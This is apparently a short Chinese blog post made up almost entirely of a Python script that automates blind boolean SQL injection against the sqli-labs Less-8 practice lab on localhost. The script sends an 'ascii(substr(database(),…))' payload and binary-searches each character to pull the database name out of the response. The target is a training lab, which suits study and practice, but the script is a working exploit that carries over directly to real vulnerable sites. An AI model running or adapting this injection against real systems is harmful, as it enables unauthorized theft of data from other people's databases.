Python小程序#

Sql布尔注入自动化##



 import sys
 import requests

url="http://127.0.0.1/sqli-labs-master/Less-8/?id=1%s"
payload="' and ascii(substr(database(),%s,1))>%s --+"
database=''
print("Start to retrive the database")
for i in range(1,9):
   max=122    #z
    min=65    #A
    while abs(max-min)>1: 
       mid=int((max+min)/2)
       p=payload % (str(i),str(mid))
       response=requests.get(url % p)
        if response.content.find("You are in")!=-1:
            min=mid
        else:
            max=mid
    database=database+chr(max)
    print("the database is :%s" % database)         




赞 赏